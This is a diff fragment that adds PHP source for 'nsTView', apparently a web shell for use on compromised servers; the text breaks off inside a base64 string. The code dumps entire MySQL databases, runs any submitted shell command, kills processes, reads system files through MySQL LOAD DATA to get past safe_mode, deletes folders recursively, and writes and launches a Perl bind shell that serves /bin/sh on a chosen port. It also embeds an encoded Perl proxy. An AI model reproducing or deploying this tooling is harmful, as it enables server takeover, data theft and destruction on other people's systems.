+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0